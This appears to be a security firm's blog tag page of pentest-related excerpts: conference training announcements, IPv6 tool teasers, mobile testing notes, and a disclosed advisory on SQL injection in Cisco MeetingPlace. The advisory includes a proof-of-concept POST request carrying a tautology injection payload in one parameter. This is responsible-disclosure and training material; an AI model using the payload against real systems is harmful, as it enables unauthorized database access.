Tag: pentest

Events
by Niki Vonderwell

Pentesting with Metasploit #TR16 Training

In this year’s MSF training we will guide you through the typical steps of the pentest cycle: information gathering, attacking and looting your targets. For each step, demos and exercises will help you deepen and test your newly acquired knowledge. In addition to the typical penetration-test scenarios you will also learn several advanced aspects of the framework such as: how writing your own metasploit modules works, how to export payloads and make them undetected. With a final exercise each day you can finally challenge yourself and apply what you have learned!

Be prepared with a Virtualbox installation and a notebook. If you prefer, you  can install MSF on your laptop beforehand and make yourself familiar with it. As a special bonus, MSF is typically one of the tools always summoned during the infamous PacketWars!

 

See you there!
Benedikt

Continue reading
Events
by Kevin Schaller

Web Hacking Special Ops Workshop @ TR16

Trooper!

You passed Hacking 1on1 with flying colors?

You evade web application firewalls as they would be opened doors?

You have successfully exploitated CVE-2015-8769?

Then it’s time for the next challenge! Follow us down the rabbit hole to the not so well known attacks against modern web applications.
Continue reading “Web Hacking Special Ops Workshop @ TR16”

Continue reading
Events
by Niklaus Schiess

Hacking 101 Training at TROOPERS16

This year’s Hacking 101 workshop at TROOPERS16 will give attendees an insight into the hacking techniques required for penetration testing. These techniques will cover various topics like information gathering, network mapping, vulnerability scanning, web application hacking, low-level exploitation and more.

During this workshop you will learn, step by step, a testing methodology that is applicable to the majority of scenarios. So imagine you have to assess the security of a system running on the Internet. How would you start? First, you need a good understanding about the target, including running services or related systems. Just scanning an IP will most likely not reveal a lot of information about the system. The gathered information may help you to identify communication relations of services that could include vulnerabilities. A brief understanding of the target and it’s related systems/services/applications will make scanning and identifying vulnerabilities a lot easier and more effective. Then, the last step will be the exploitation of the identified vulnerabilities, with the ultimate aim to get access to the target system and pivot to other, probably internal, systems and resources.

So if you are interested in learning these techniques and methodologies, join us at the TROOPERS16 Hacking 101 training! Attendees should have a brief understanding of TCP/IP networking and should be familiar with command lines on Linux systems. Also, being familiar with a programming/scripting language is considered useful.

 

Continue reading
Breaking
by Enno Rey

Chiron – An All-In-One IPv6 Penetration Testing Framework

This is a guest post from Antonios Atlasis.

Last week I had the pleasure to give you my impressions regarding my experience about hacking for b33r at Ghent, that is, my participation at BruCON 2014 hacking conference. As I said among else, the reason that I was there was to present Chiron, my IPv6 penetration testing/security assessment framework, which was supported by the Brucon 5×5 program. The first version of Chiron had been presented at Troopers 14, during the IPv6 Security Summit.

Continue reading “Chiron – An All-In-One IPv6 Penetration Testing Framework”

Continue reading
Breaking
by Enno Rey

A Short Teaser on My New IPv6 Testing Framework

This is a guest post from Antonios Atlasis
==============================

 

Hi,

my name is Antonios and I am an independent IT Security Researcher from Greece. One of my latest “hobbies” is IPv6 and its potential insecurities so, please let me talk to you about my latest experience on this.

This week, I had the opportunity to work together with the ERNW guys at their premises. They had built an IPv6 lab that included several commercial IPv6 security devices (firewalls, IDS/IPS and some high-end switches) and they kindly offered their lab to me to play with (thank you guys 🙂 – I always liked …expensive toys). The goal of this co-operation was two-fold: First, to test my new (not yet released) IPv6 pen-testing tool and secondly, to try to find out any IPv6-related security or operational issues on these devices (after all, they all claim that they are “IPv6-Ready”, right?).

Continue reading “A Short Teaser on My New IPv6 Testing Framework”

Continue reading
Breaking
by Daniel Mende

BlackBerry 10 USB Modes

So we got these shiny new BlackBerry Q10 and Z10 device laying on the desk one morning. It’s my first BlackBerry, I have to admit, but never the less, the hole wushy GUI and touchy glass stuff wasn’t my main concern, instead i took a look at the stuff going on while you connect the phone (do i have to call it blackberry? its a phone, isn’t it?) to your computer.

Continue reading “BlackBerry 10 USB Modes”

Continue reading
Breaking
by Michael Thumann

Mobile Application Testing

Our new workshop about mobile application testing, held for the 1st time at the Troopers conference 2013, is coming closer. So I would like to take the opportunity and post an appetizer for those who are still undetermined if they should attend the workshop ;-).

While the topic of mobile application testing is a wide field that may contain reverse engineering, secure storage analysis, vulnerability research, network traffic analysis and so forth, in the end of the day you have to answer one question: Can I trust this application and run it on my enterprise devices? So first you have to define some criteria, which kind of behavior and characteristics of an application you regard as trustworthy (or not). Let us peek at malware … besides harming your devices and data, malware is typically:

  • obfuscated and/or encrypted
  • contains anti-debugging features
  • contains anti-reverse engineering features

This makes the analysis process a difficult task and comparing these characteristics especially to ordinary iOS applications from the AppStore, at least one is also true for these apps: Those are encrypted and are only decrypted at runtime on your Apple gadget ;-).

Continue reading “Mobile Application Testing”

Continue reading
Breaking
by Daniel Mende

SQL Injection in Cisco MeetingPlace

Cisco has released a security advisory for a vulnerability we discovered last year.
For comparison here is our original advisory to cisco:

Security Advisory for Cisco Unified Communications Solution
Release Date: 11/8/2012
Author: Daniel Mende
1 SUMMARY
Multiple critical SQL injections exist in Cisco unified meeting place.
2 AFFECTED PRODUCTS
The following Products have been tested as vulnerable so far:
Cisco Unified Meetingplace with the following modules:
• MeetingPlace Agent 7.1.1.9
• MeetingPlace Audio Service 7.1.1.8
• MeetingPlace Gateway SIM 7.1.1.2
• MeetingPlace Replication Service 7.1.1.9
• MeetingPlace Master Service 7.1.1.8
• MeetingPlace Extension 7.1.1.8
• MeetingPlace Authentication Filter 7.1.1.8
3 DETAILS
The following parameters are affected:
http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]
4 VULNERABILITY SCORING
The severity rating based on CVSS Version 2:
Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P)
CVSS Version 2 Score: 6.5
Severity: Low
5 PROOF OF CONCEPT
POST /mpweb/scripts/mpx.dll HTTP/1.1
Host: 10.X.X.X
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.X.X.X/mpweb/scripts/mpx.dll
Cookie: cookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 571
SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683-
AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg
&wcMeetingID=&wcRecurMtgID=‘ or 1=1 —&URL0=wcBase.tpl&TXT0=Startseite&URL1=&
TXT1=&URL2=&TXT2=&URL3=&TXT3=&URL4=&TXT4=&URL5=&TXT5=&MtgCatToSearch=
%28all%2Bcategories%29&ML_PublicPosted=Yes&MtgIDToSearch=0000007&SchedulerID=
&wcRequest=&wcHash=&FormType=listmeetings&wcState=3&STPL=wcFindMtg.tpl&FTPL=
wcFindMtg.tpl&ML_List=MT_Today&ML_EndTime_Month=&ML_EndTime_Day=&ML_End
Time_Year=&ML_ShowContMtgs=Yes&SP_VLanguage=lang999i00

 

As we are at the topic of Cisco’s Unified Communications Solution, there is a lot more in the queue to come up, just be patient a little longer, it’ll be worth it (-;

 

cheers

/daniel

Continue reading